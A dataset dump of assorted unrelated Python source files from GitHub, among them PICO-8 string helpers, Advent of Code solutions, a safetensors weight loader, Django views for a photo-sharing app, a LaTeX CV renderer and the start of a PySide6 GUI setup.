Table\n\n\nBTN_X = \"❎\"\nBTN_O = \"🅾️\"\nBTN_LEFT = \"⬅️\"\nBTN_RIGHT = \"➡️\"\nBTN_UP = \"⬆️\"\nBTN_DOWN = \"⬇️\"\nPROBLEMATIC_MULTI_CHAR_CHARS = (BTN_O, BTN_X, BTN_LEFT, BTN_RIGHT, BTN_UP, BTN_DOWN)\n\n\ndef printh(s, filename=None, overwrite=False, save_to_desktop=False):\n \"\"\"\n >>> filename = \"pico8_printh_test.txt\"\n >>> printh('pico8 printh test', filename, overwrite=True, save_to_desktop=True)\n >>> open(os.path.join(os.environ[\"HOMEPATH\"], \"Desktop\", os.path.split(filename)[1])).read()\n 'pico8 printh test'\n \"\"\"\n if save_to_desktop:\n filename = os.path.join(\n os.environ[\"HOMEPATH\"], \"Desktop\", os.path.split(filename)[1]\n )\n if filename:\n with open(filename, \"w\" if overwrite else \"a\") as fp:\n fp.write(s)\n else:\n builtins.print(s)\n\n\ndef pico8_to_python(s):\n r\"\"\"Hackily translates PICO-8 to Python.\n >>> pico8_to_python('for i=0,30 do ?\"웃\"')\n 'def _init():\\n global \\nfor i in range(0, 30+1): print(\"웃\")\\nrun(_init, _update, _draw)'\n \"\"\"\n import re # noqa\n\n s = s.replace(\"local\", \"\")\n s = re.sub(r\"#([a-zA-Z0-9]+)\", r\"len(\\1)\", s)\n # Lua table\n s = s.replace(\"{[0]=\", \"([\").replace(\"}\", \"])\") # 0-based\n s = s.replace(\"{\", \"Table([\") 
# 1-based\n # logic\n s = re.sub(r\"\\s*then\", \":\", s)\n s = s.replace(\"elseif\", \"elif\")\n s = s.replace(\"else\", \"else:\")\n s = re.sub(\n r\"function\\b\\s*([^)]+)\\)\", r\"def \\1):\\n \", s\n ) # Note: Extra parameters are default None.\n s = s.replace(\"end\", \"# }\")\n # operators\n s = s.replace(\"...\", \"*argv\")\n s = s.replace(\"..\", \"+\")\n s = s.replace(\"^\", \"**\")\n s = s.replace(\"\\\\\", \"//\")\n s = re.sub(r\"//\\s*1\\b\", \"#int()\", s)\n s = s.replace(\"~=\", \"!=\")\n s = re.sub(r\",%([a-zA-Z0-9]+)\", r\",peek2(\\1)\", s)\n # comments\n s = re.sub(r\"--\\[\\[(.*?)\\]\\]\", r\"'''\\1'''\", s, flags=re.DOTALL)\n s = re.sub(r\"\\[\\[(.*?)\\]\\]\", r'\"\"\"\\1\"\"\"', s, flags=re.DOTALL)\n s = s.replace(\"--\", \"#\")\n # loops, whose variable is local to the loop (TODO). https://www.lexaloffle.com/bbs/?pid=51130#p\n s = re.sub(r\"([0-9)\\] ])\\s*do\\b\", r\"\\1:\", s)\n s = re.sub(\n r\"for (.*?)=(.+?),(.+?),(.+?):\",\n r\"\\1 = \\2\\nwhile \\1 <= \\3:\\n \\1 += \\4 # TODO, move to end of loop\\n\",\n s,\n )\n s = re.sub(\n r\"for (.*?)=([^,]+),(.*?):\",\n r\"for \\1 in range(\\2, \\3+1):\",\n s,\n )\n # print\n s = (\n s.replace(BTN_X, \"P0_X\")\n .replace(BTN_O, \"P0_O\")\n .replace(BTN_LEFT, \"P0_LEFT\")\n .replace(BTN_RIGHT, \"P0_RIGHT\")\n .replace(BTN_UP, \"P0_UP\")\n .replace(BTN_DOWN, \"P0_DOWN\")\n )\n s = re.sub(r\"print\\(?(\\b[^\\)]+?)\\)?\", r\"print(\\1)\", s)\n s = re.sub(r\"\\?\\s*(.*)\", r\"print(\\1)\", s)\n\n s = re.sub(r\"\\bdel\\b\", \"delete\", s)\n # separate statements\n s = re.sub(r\"([\\])])([a-zA-Z])\", r\"\\1\\n\\2\", s)\n # hooks\n s = \"def _init():\\n global \\n\" + s\n s = re.sub(r\"\\n{3,}\", r\"\\n\\n\", s)\n s = s.replace(\"::_::\", \"\\n\\n\\ndef _update(): pass\\n\\n\\ndef _draw():\\n global \\n\")\n s = s.replace(\"goto _\", \"return\")\n s = s.replace(\"def update():\\n\", \"def update():\\n global \")\n if \"_update60\" in s:\n s += \"\\nrun(_init, _update60, _draw)\"\n else:\n s += \"\\nrun(_init, _update, _draw)\"\n return s\n\n\ndef tostr(val, use_hex=False):\n if use_hex:\n return hex(val)\n return str(val)\n\n\ndef tonum(s):\n \"\"\"Converts a string representation of a decimal, hexadecimal, or binary number to a number value, or 0 if conversion fails.\"\"\"\n if type(s) in (int, float):\n return s\n\n if s is None:\n return 0\n\n base = 10\n if isinstance(s, str):\n if \"x\" in s:\n base = 16\n elif \"b\" in s:\n base = 2\n\n try:\n return int(s, base)\n except ValueError:\n return 0\n\n\ndef chr(index): # noqa\n return builtins.chr(flr(tonum(index) % 256))\n\n\ndef ord(s, index=1): # noqa\n \"\"\"\n >>> ord(\"@\")\n 64\n >>> ord(\"123\", 2) # returns 50 (the second character: \"2\")\n 50\n \"\"\"\n c = s[index - 1]\n return builtins.ord(c)\n\n\ndef sub(s, pos0, pos1=None):\n \"\"\"\n Grab a substring from string str, from pos0 up to and including pos1.\n When pos1 is not specified, the remainder of the string is returned.\n\n >>> s = \"the quick brown fox\"\n >>> sub(s, 5, 9)\n 'quick'\n >>> sub(s, -2.1, -.1)\n 'fox'\n >>> sub(s, -2.1, -2)\n 'fo'\n \"\"\"\n pos0 = flr(pos0) - (1 if pos0 >= 1 else 0)\n if pos1 is not None:\n pos1 = flr(pos1)\n if pos1 < 0:\n pos1 += 1\n if pos1 >= 0:\n pos1 = None\n return s[pos0 : pos1]\n\n\ndef split(s, separator=\",\", convert_numbers=True):\n \"\"\"\n Split a string into a table of elements delimited by the given separator (defaults to \",\").\n When convert_numbers is true, numerical tokens are stored as numbers (defaults to true).\n Empty elements are stored as empty strings.\n When the 
separator is \"\", every character is split into a separate element.\n\n >>> split(\"1,2,3\")\n {1: 1, 2: 2, 3: 3}\n >>> split(\"one:two:3\",\":\",False)\n {1: 'one', 2: 'two', 3: '3'}\n >>> split(\"1,,2,\")\n {1: 1, 2: '', 3: 2, 4: ''}\n \"\"\"\n result = []\n items = s.split(separator)\n for item in items:\n if convert_numbers:\n try:\n if item == \"\":\n result.append(\"\")\n else:\n result.append(tonum(item))\n except ValueError:\n result.append(item)\n else:\n result.append(item)\n return Table(result)","repo_name":"CTimmerman/PyPico8","sub_path":"src/pypico8/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15694142326","text":"import utils\nimport time\nimport copy\nimport math\nimport re\nimport heapq\nimport numpy as np\nimport os\nfrom collections import Counter\nfrom os import path\n\nday = 19\n\nfilename=\"input\"+str(day)+\".txt\"\n# filename=\"testinput\"+str(day)+\".txt\"\n\nbasepath = path.dirname(__file__)\nfilepath = path.abspath(path.join(basepath, filename))\n\ninput = []\n\nwith open(filepath) as f:\n input = [l.strip() for l in f.readlines()] # One entry for each line\n \n # input = [x for x in input]\n # input = [int(x) for x in input[0].split(',')]\n # input = [int(x.strip()) for x in input]\n # input = [x.strip() for x in input]\n # input = [[int(s) for s in x] for x in input]\n \nclass Beacon:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n self.d_sqs = []\n \n def __str__(self):\n return \"(%d, %d, %d)\"%(self.x, self.y, self.z)\n \n def d_squared_to(self, other):\n return (self.x - other.x)**2 + (self.y - other.y)**2 + (self.z - other.z)**2\n \n def shared_distances(self, other):\n c = list((Counter(self.d_sqs) & Counter(other.d_sqs)).elements())\n # print(c)\n # if len(c)>10:\n # print(c)\n return len(c)\n \n def array_value(self):\n return np.array([self.x,self.y,self.z])\n \n def get_vector_to(self, other):\n return [other.x - self.x, other.y - self.y, other.z - self.z]\n \n def get_relative_vecs(self, peers):\n return [self.get_vector_to(p) for p in peers]\n \n def rotate(self, transpose_matrix):\n new_a = self.array_value() @ transpose_matrix\n self.x = new_a[0]\n self.y = new_a[1]\n self.z = new_a[2]\n \n def translate(self, translation_vector):\n new_a = self.array_value() + translation_vector\n self.x = new_a[0]\n self.y = new_a[1]\n self.z = new_a[2] \n \n # def __sub__(self, other):\n \n \ndef all_rotations():\n i = np.array([[1, 0, 0],[0, 1, 0],[0, 0, 1]])\n \n roll = np.array([[1, 0, 0],[0, 0, 1],[0, -1, 0]]) # roll top to face away from you - rolls around x-axis\n turn = np.array([[0, 0, 1],[0, 1, 0],[-1, 0, 0]]) # Turn anti-clockwise - turn around y-axis\n \n transforms = []\n \n last = i\n # transforms.append(last)\n for r in range(3):\n for t in range(3):\n last = last @ turn\n transforms.append(last)\n last = last @ roll\n transforms.append(last)\n \n last = last @ roll @ turn @ roll\n \n\n for r in range(3):\n for t in range(3):\n last = last @ turn\n transforms.append(last)\n last = last @ roll\n transforms.append(last)\n \n return transforms\n # Add initial\n # Turn 3 times\n # Roll\n # Turn 3 times\n \n\nclass Scanner:\n def __init__(self, num):\n self.num = num\n self.beacons = []\n self.location = np.array([0,0,0])\n \n def __str__(self):\n return (\"Scanner %d (%s): [%s]\"%(self.num, self.location, \", \".join([s.__str__() for s in self.beacons])))\n \n def __repr__(self):\n 
return self.__str__()\n \n def calc_distances(self): \n # print(len(self.beacons))\n for i in range(len(self.beacons)-1):\n bi = self.beacons[i]\n for j in range(i+1, len(self.beacons)):\n bj = self.beacons[j]\n d_sq = bi.d_squared_to(bj)\n bi.d_sqs.append(d_sq)\n bj.d_sqs.append(d_sq)\n \n def rotate(self, transpose_matrix):\n for b in self.beacons:\n b.rotate(transpose_matrix)\n \n def translate(self, translation_vector):\n for b in self.beacons:\n b.translate(translation_vector)\n self.location = translation_vector\n \n def manhattan_distance_to(self, other):\n # print(other.location, self.location)\n diff = other.location - self.location\n dist = sum([abs(x) for x in diff])\n # print(dist)\n return dist\n \n \n def align_other_to_self(self, other):\n # This scanner overlaps with another if 12 of the beacons are the same\n my_matching_beacons = []\n their_matching_beacons = []\n # To find this, check if any single beacon in my list has 12 overlapping d_sqs with any beacon in their list\n for mybeacon in self.beacons:\n for theirbeacon in other.beacons:\n # print(\"Checking: \", mybeacon, theirbeacon)\n x = mybeacon.shared_distances(theirbeacon)\n if x > 10:\n # print(\"Found one!!\", x, mybeacon, theirbeacon)\n my_matching_beacons.append(mybeacon)\n # my_matching_beacons = np.concatenate((my_matching_beacons, np.array()))\n their_matching_beacons.append(theirbeacon)\n if len(my_matching_beacons) > 10:\n my_vecs = my_matching_beacons[0].get_relative_vecs(my_matching_beacons[1:])\n their_vecs = their_matching_beacons[0].get_relative_vecs(their_matching_beacons[1:])\n \n my_a = np.array(my_vecs)\n their_a = np.array(their_vecs)\n\n ts = all_rotations()\n \n for t in ts:\n check = their_a @ t\n # print(check)\n if np.array_equal(my_a, check):\n # print(\"wtf\", check, t)\n break\n # print(t)\n \n my_b0 = my_matching_beacons[0]\n their_b0 = their_matching_beacons[0]\n \n other.rotate(t)\n \n translation = my_b0.array_value() - their_b0.array_value()\n # print(translation)\n other.translate(translation)\n\n return True\n else:\n return None\n \n\ndef parse_input():\n scanners = []\n s = None\n for line in input:\n if line[:3] == \"---\":\n n = int(line.split(\" \")[2])\n # print(n)\n s = Scanner(n)\n elif line == \"\":\n # print(s)\n scanners.append(s)\n s = None\n else:\n [x,y,z] = [int(v) for v in line.split(\",\")]\n p = Beacon(x, y, z)\n s.beacons.append(p)\n\n scanners.append(s)\n # print(s)\n return scanners\n \n\n\ndef orient_scanners():\n\n scanners = parse_input()\n # print(scanners)\n \n for scanner in scanners:\n scanner.calc_distances()\n \n \n queue = [scanners[0]]\n \n disoriented_scanners = scanners[1:]\n \n while queue:\n o = queue.pop()\n still_disoriented = []\n for d in disoriented_scanners:\n did_realign = o.align_other_to_self(d)\n if did_realign:\n queue.append(d)\n # print()\n # print(\"Realigned!\", d)\n else:\n still_disoriented.append(d)\n disoriented_scanners = still_disoriented\n return scanners\n\ndef part1():\n scanners = orient_scanners()\n \n out_set = set()\n for s in scanners:\n for b in s.beacons:\n out_set.add((b.x,b.y,b.z))\n \n return len(out_set)\n \ndef part2():\n scanners = orient_scanners()\n \n print(\"Length: \", len(scanners))\n max_dist = 0\n for i in range(len(scanners)-1):\n for j in range(i+1, len(scanners)):\n print(i,j)\n a = scanners[i]\n b = scanners[j]\n dist = a.manhattan_distance_to(b)\n\n print(a.location, b.location)\n print(a.location - b.location)\n print(abs(dist))\n\n if abs(dist) > max_dist:\n max_dist = abs(dist)\n \n return 
max_dist\n\n\n# --- #\n\nif __name__ == \"__main__\":\n utils.funWrapper(part1, \"Part 1\")\n utils.funWrapper(part2, \"Part 2\")","repo_name":"jtbthethird/adventofcode","sub_path":"2021/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34852548279","text":"from sys import maxsize\nfrom random import randint\n\n\ndef rand():\n return randint(0, maxsize)\n\n\ndef f(x, y, n):\n if y == 0:\n return 1\n if y == 1:\n return x\n w = f(x, int(y/2), n)\n w = (w * w) % n\n if y % 2 == 1:\n w = (w * x) % n\n return w\n\n\ndef prime(a) -> bool:\n if a == 2:\n return True\n for i in range(1, 5+1):\n b = rand() % (a - 2) + 2\n if f(b, a-1, a) != 1:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n print(prime(13))\n","repo_name":"P79N6A/daily-practice","sub_path":"code/python/algorithms/miller_rabin.py","file_name":"miller_rabin.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17869529184","text":"import pytest\nimport spack.store\nimport spack.cmd.uninstall\n\n\nclass MockArgs(object):\n\n def __init__(self, packages, all=False, force=False, dependents=False):\n self.packages = packages\n self.all = all\n self.force = force\n self.dependents = dependents\n self.yes_to_all = True\n\n\ndef test_uninstall(database):\n parser = None\n uninstall = spack.cmd.uninstall.uninstall\n # Multiple matches\n args = MockArgs(['mpileaks'])\n with pytest.raises(SystemExit):\n uninstall(parser, args)\n # Installed dependents\n args = MockArgs(['libelf'])\n with pytest.raises(SystemExit):\n uninstall(parser, args)\n # Recursive uninstall\n args = MockArgs(['callpath'], all=True, dependents=True)\n uninstall(parser, args)\n\n all_specs = spack.store.layout.all_specs()\n assert len(all_specs) == 7\n # query specs with multiple configurations\n mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]\n callpath_specs = [s for s in all_specs if s.satisfies('callpath')]\n mpi_specs = [s for s in all_specs if s.satisfies('mpi')]\n\n assert len(mpileaks_specs) == 0\n assert len(callpath_specs) == 0\n assert len(mpi_specs) == 3\n","repo_name":"Mattlk13/spack","sub_path":"lib/spack/spack/test/cmd/uninstall.py","file_name":"uninstall.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22002937380","text":"from glob import glob\nfrom os import path\nfrom typing import *\n\nimport torch\nfrom safetensors import safe_open\n\n\nclass Weights:\n def __init__(\n self,\n model_name_or_path: str,\n device: torch.device,\n dtype: torch.dtype,\n quantize_method: Optional[str] = None,\n gptq_model_base_name: Optional[str] = None\n ):\n if not path.isdir(model_name_or_path):\n raise NotADirectoryError(f\"{model_name_or_path} not exists.\")\n routing = {}\n file_pattern = \"*.safetensors\"\n if quantize_method == \"gptq\":\n file_pattern = \"gptq_model*.safetensors\"\n if gptq_model_base_name:\n file_pattern = f\"{gptq_model_base_name}*.safetensors\"\n for model_file in glob(path.join(model_name_or_path, file_pattern)):\n with safe_open(model_file, framework=\"pt\") as f:\n for k in f.keys():\n if k in routing:\n raise RuntimeError(\n f\"Key {k} was found in multiple files: {model_file} and {routing[k]}\"\n )\n routing[k] = model_file\n self.routing = routing\n self.device = 
device\n self.dtype = dtype\n self._handles = {}\n\n def _get_handle(self, filename: str):\n if filename not in self._handles:\n f = safe_open(filename, framework=\"pt\")\n self._handles[filename] = f\n\n return self._handles[filename]\n\n def get_filename(self, tensor_name: str) -> (str, str):\n filename = self.routing.get(tensor_name, None)\n if filename is None:\n raise RuntimeError(f\"weight {tensor_name} does not exist\")\n return str(filename), tensor_name\n\n def _get_slice(self, tensor_name: str):\n filename, tensor_name = self.get_filename(tensor_name)\n f = self._get_handle(filename)\n slice_ = f.get_slice(tensor_name)\n return slice_\n\n def get_shape(self, tensor_name: str):\n return self._get_slice(tensor_name).get_shape()\n\n def get_tensor(self, tensor_name: str):\n filename, tensor_name = self.get_filename(tensor_name)\n f = self._get_handle(filename)\n tensor = f.get_tensor(tensor_name)\n # Special case for gptq which shouldn't convert\n # u4 which are disguised as int32\n if tensor.dtype not in [torch.int32, torch.int64]:\n tensor = tensor.to(dtype=self.dtype)\n tensor = tensor.to(device=self.device)\n return tensor\n\n def get_gptq_weight(self, prefix: str):\n try:\n qweight = self.get_tensor(f\"{prefix}.qweight\")\n except RuntimeError:\n raise RuntimeError(\n \"Cannot load `gptq` weight, make sure the model is already quantized, or quantize it with `text-generation-server quantize ORIGINAL_MODEL_ID NEW_MODEL_ID`\"\n )\n qzeros = self.get_tensor(f\"{prefix}.qzeros\")\n scales = self.get_tensor(f\"{prefix}.scales\")\n g_idx = self.get_tensor(f\"{prefix}.g_idx\")\n try:\n bias = self.get_tensor(f\"{prefix}.bias\")\n except RuntimeError:\n bias = None\n\n return qweight, qzeros, scales, g_idx, bias\n","repo_name":"modelize-ai/LLM-Inference-Deployment-Tutorial","sub_path":"code/server/continuous_batching_server/modeling/utils/weights.py","file_name":"weights.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"23491120776","text":"# Python 3.6.1\n\nfrom collections import deque\nfrom itertools import cycle\n\n\nwith open(\"input.txt\", \"r\") as f:\n puzzle_input = [int(i) for i in f.read().split()]\n\n\ndef main():\n frequencies = set()\n freq = 0\n\n for i in cycle(puzzle_input):\n if freq in frequencies:\n return freq\n frequencies.add(freq)\n freq += i\n\n\nprint(main())\n","repo_name":"foxscotch/advent-of-code","sub_path":"2018/01/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18628598762","text":"from flask_script import Manager\nfrom songbase import app, db, Author, Song\n\nmanager = Manager(app)\n\n\n@manager.command\ndef deploy():\n print(\"resetting database\")\n db.drop_all()\n db.create_all()\n\n print(\"inserting initial data\")\n rowling = Author(name=\"JK Rowling\", about=\"this is jk rowling\")\n austin = Author(name=\"Jane Austin\", about=\"this is jane\")\n lee = Author(name=\"Harper Lee\", about=\"this is harper\")\n potter = Song(name='Harry Potter', year=1997, author=rowling)\n pride = Song(name='Pride and Prejudice', year=1813, author=austin)\n mockingbird = Song(name='To Kill a Mockingbird', year=1960, author=lee)\n\n db.session.add(rowling)\n db.session.add(austin)\n db.session.add(lee)\n db.session.add(potter)\n db.session.add(pride)\n db.session.add(mockingbird)\n\n db.session.commit()\n\n\nif __name__ == '__main__':\n 
manager.run()\n","repo_name":"judyyang123/final-project","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71370102612","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import SignUpForm, UpdateUserForm, UpdateUserProfileForm, PostForm, CommentForm\nfrom django.contrib.auth import login, authenticate\nfrom .models import Post, Comment, Profile, Follow\nfrom django.contrib.auth.models import User\nfrom django.template.loader import render_to_string\nfrom django.views.generic import RedirectView\n\n# Create your views here.\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('index')\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n@login_required(login_url='login')\ndef index(request):\n images = Post.objects.all()\n users = User.objects.exclude(id=request.user.id)\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.user = request.user.profile\n post.save()\n return HttpResponseRedirect(request.path_info)\n else:\n form = PostForm()\n params = {\n 'images': images,\n 'form': form,\n 'users': users,\n\n }\n return render(request, 'gram_temp/index.html', params)\n\n\n@login_required(login_url='login')\ndef profile(request, username):\n images = request.user.profile.posts.all()\n if request.method == 'POST':\n user_form = UpdateUserForm(request.POST, instance=request.user)\n prof_form = UpdateUserProfileForm(request.POST, request.FILES, instance=request.user.profile)\n if user_form.is_valid() and prof_form.is_valid():\n user_form.save()\n prof_form.save()\n return HttpResponseRedirect(request.path_info)\n else:\n user_form = UpdateUserForm(instance=request.user)\n prof_form = UpdateUserProfileForm(instance=request.user.profile)\n params = {\n 'user_form': user_form,\n 'prof_form': prof_form,\n 'images': images,\n\n }\n return render(request, 'gram_temp/profile.html', params)\n\n\n@login_required(login_url='login')\ndef user_profile(request, username):\n user_prof = get_object_or_404(User, username=username)\n if request.user == user_prof:\n return redirect('profile', username=request.user.username)\n user_posts = user_prof.profile.posts.all()\n \n followers = Follow.objects.filter(followed=user_prof.profile)\n follow_status = False\n for follower in followers:\n if request.user.profile == follower.follower:\n follow_status = True\n break\n params = {\n 'user_prof': user_prof,\n 'user_posts': user_posts,\n 'followers': followers,\n 'follow_status': follow_status\n }\n print(followers)\n return render(request, 'gram_temp/user_profile.html', params)\n\n\n@login_required(login_url='login')\ndef post_comment(request, id):\n image = get_object_or_404(Post, pk=id)\n is_liked = False\n if image.likes.filter(id=request.user.id).exists():\n is_liked = True\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n savecomment = 
form.save(commit=False)\n            savecomment.post = image\n            savecomment.user = request.user.profile\n            savecomment.save()\n            return HttpResponseRedirect(request.path_info)\n    else:\n        form = CommentForm()\n    params = {\n        'image': image,\n        'form': form,\n        'is_liked': is_liked,\n        'total_likes': image.total_likes()\n    }\n    return render(request, 'gram_temp/single_post.html', params)\n\n\ndef like_post(request):\n    # image = get_object_or_404(Post, id=request.POST.get('image_id'))\n    image = get_object_or_404(Post, id=request.POST.get('id'))\n    is_liked = False\n    if image.likes.filter(id=request.user.id).exists():\n        image.likes.remove(request.user)\n        is_liked = False\n    else:\n        image.likes.add(request.user)\n        is_liked = True\n\n    params = {\n        'image': image,\n        'is_liked': is_liked,\n        'total_likes': image.total_likes()\n    }\n    if request.is_ajax():\n        html = render_to_string('gram_temp/like_section.html', params, request=request)\n        return JsonResponse({'form': html})\n\n@login_required(login_url='login')\ndef search_profile(request):\n    if 'search_user' in request.GET and request.GET['search_user']:\n        name = request.GET.get(\"search_user\")\n        results = Profile.search_profile(name)\n        print(results)\n        message = f'{name}'\n        params = {\n            'results': results,\n            'message': message\n        }\n        return render(request, 'gram_temp/results.html', params)\n    else:\n        message = \"You haven't searched for any image category\"\n        return render(request, 'gram_temp/results.html', {'message': message})\n\ndef unfollow(request, to_unfollow):\n    if request.method == 'GET':\n        user_profile2 = Profile.objects.get(pk=to_unfollow)\n        unfollow_d = Follow.objects.filter(follower=request.user.profile, followed=user_profile2)\n        unfollow_d.delete()\n        return redirect('user_profile', user_profile2.user.username)\n\n\ndef follow(request, to_follow):\n    if request.method == 'GET':\n        user_profile3 = Profile.objects.get(pk=to_follow)\n        follow_s = Follow(follower=request.user.profile, followed=user_profile3)\n        follow_s.save()\n        return redirect('user_profile', user_profile3.user.username)","repo_name":"default-007/Snapgram","sub_path":"gram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"70409244691","text":"import numpy as np\n\n\ndef plot_landscape(df, nbins=10, symetric=True, cmap='RdBu_r'):\n    import matplotlib.pyplot as plt\n\n    # get the sizes of the multiplets\n    sizes = np.array(list(df['Sizes']))\n    usizes = np.unique(sizes)\n\n    # get the oinfo\n    oinfo = np.array(list(df['Oinfo'] )) * np.array(list(df['Sign']))\n    omin, omax = oinfo.min(), oinfo.max()\n    if symetric:\n        ominmax = max(abs(omin), abs(omax))\n        omin, omax = -ominmax, ominmax\n    print(omin, omax)\n    bins = np.linspace(omin, omax, nbins + 1, endpoint=True)\n\n    obins = np.full((nbins, len(usizes)), np.nan)\n    for n_m, m in enumerate(usizes):\n        oinfo_s = oinfo[sizes == m]\n        for n_b in range(nbins - 1):\n            indices = np.logical_and(\n                bins[n_b] <= oinfo_s, oinfo_s <= bins[n_b + 1])\n            if np.any(indices):\n                # obins[n_b, n_m] = oinfo_s[indices].mean()\n                obins[n_b, n_m] = indices.sum()\n            # else:\n            #     obins[n_b, n_m] = 0.\n\n    plt.pcolormesh(usizes, bins, obins, cmap=cmap)  # vmin=omin, vmax=omax\n    plt.xlabel('Multiplet size')\n    plt.ylabel('Oinfo')\n    plt.colorbar()\n\n    return plt.gca()\n\n\nif __name__ == '__main__':\n    import matplotlib.pyplot as plt\n    import pandas as pd\n\n    file = 'DA_21_genes.xlsx'\n    path = '/run/media/etienne/DATA/Toolbox/BraiNets/hoi_bhk/etienne/hoi_bhk/'\n\n    df = 
pd.read_excel(path + file)\n\n obins = plot_landscape(df, nbins=60, cmap='turbo', symetric=False)\n\n\n plt.show()\n","repo_name":"brainets/hoi_bhk","sub_path":"etienne/hoi_bhk/plot_hoi.py","file_name":"plot_hoi.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19678180129","text":"import jinja2\nimport os\nimport codecs\nfrom sys import argv\nfrom jinja2 import Template\nimport yaml\nimport io\n\nclass Loader(yaml.Loader):\n\n def __init__(self, stream):\n\n self._root = os.path.split(stream.name)[0]\n\n super(Loader, self).__init__(stream)\n\n def include(self, node):\n\n filename = os.path.join(self._root, self.construct_scalar(node))\n\n with io.open(filename, 'r', encoding='utf8') as f:\n return yaml.load(f, Loader)\n\nLoader.add_constructor('!include', Loader.include)\n\nlatex_jinja_env = jinja2.Environment(\n block_start_string = '\\BLOCK{',\n block_end_string = '}',\n variable_start_string = '\\VAR{',\n variable_end_string = '}',\n comment_start_string = '\\#{',\n comment_end_string = '}',\n line_statement_prefix = '%%',\n line_comment_prefix = '%#',\n trim_blocks = True,\n autoescape = False,\n loader = jinja2.FileSystemLoader(os.path.abspath('.'))\n)\n\ntemplate = latex_jinja_env.get_template('latex/template.tex')\n\nbuild_d = \"{}{}.build\".format(os.path.abspath('.'), os.sep)\ngenerated = \"{}{}generated\".format(os.path.abspath('.'), os.sep)\n\ndef create_folders():\n global build_d\n if not os.path.exists(build_d): # create the build directory if not existing\n os.makedirs(build_d)\n if not os.path.exists(generated): # create the build directory if not existing\n os.makedirs(generated)\n\n\ndef main(datafile):\n global template\n create_folders()\n with open(datafile) as inputfile:\n out_name = os.path.splitext(os.path.basename(datafile))[0] + \".tex\"\n data = yaml.load(inputfile, Loader)\n output_name = os.path.join(generated, out_name)\n with codecs.open(output_name, 'w', \"utf-8\") as outfile:\n outfile.write(template.render(data))\n\nif __name__ == \"__main__\":\n main(datafile=argv[1])\n","repo_name":"rouzbeh/cv","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19681800944","text":"# ///////////////////////////////////////////////////////////////\n#\n# BY: WANDERSON M.PIMENTA\n# PROJECT MADE WITH: Qt Designer and PySide6\n# V: 1.0.0\n#\n# This project can be used freely for all uses, as long as they maintain the\n# respective credits only in the Python scripts, any information in the visual\n# interface (GUI) can be modified without any implication.\n#\n# There are limitations on Qt licenses if you want to use your products\n# commercially, I recommend reading them on the official website:\n# https://doc.qt.io/qtforpython/licenses.html\n#\n# ///////////////////////////////////////////////////////////////\n\n# IMPORT PACKAGES AND MODULES\n# ///////////////////////////////////////////////////////////////\nfrom gui.widgets.py_table_widget.py_table_widget import PyTableWidget\nfrom . 
functions_main_window import *\nimport analyser\nimport sys\nimport os\n\n# IMPORT QT CORE\n# ///////////////////////////////////////////////////////////////\nfrom qt_core import *\n\n# IMPORT SETTINGS\n# ///////////////////////////////////////////////////////////////\nfrom gui.core.json_settings import Settings\n\n# IMPORT THEME COLORS\n# ///////////////////////////////////////////////////////////////\nfrom gui.core.json_themes import Themes\n\n# IMPORT PY ONE DARK WIDGETS\n# ///////////////////////////////////////////////////////////////\nfrom gui.widgets import *\n\n# LOAD UI MAIN\n# ///////////////////////////////////////////////////////////////\nfrom . ui_main import *\n\n# MAIN FUNCTIONS\n# ///////////////////////////////////////////////////////////////\nfrom . functions_main_window import *\n\n# PY WINDOW\n# ///////////////////////////////////////////////////////////////\n\n\nclass SetupMainWindow:\n    def __init__(self):\n        super().__init__()\n        # SETUP MAIN WINDOW\n        # Load widgets from \"gui\\uis\\main_window\\ui_main.py\"\n        # ///////////////////////////////////////////////////////////////\n        self.ui = UI_MainWindow()\n        self.ui.setup_ui(self)\n\n    # ADD LEFT MENUS\n    # NOTE: the menu definitions are class attributes (not __init__ locals),\n    # so that setup_gui() can read them as SetupMainWindow.add_left_menus\n    # ///////////////////////////////////////////////////////////////\n    add_left_menus = [\n        {\n            \"btn_icon\": \"icon_home.svg\",\n            \"btn_id\": \"btn_home\",\n            \"btn_text\": \"Home\",\n            \"btn_tooltip\": \"Home page\",\n            \"show_top\": True,\n            \"is_active\": True\n        },\n        {\n            \"btn_icon\": \"icon_file.svg\",\n            \"btn_id\": 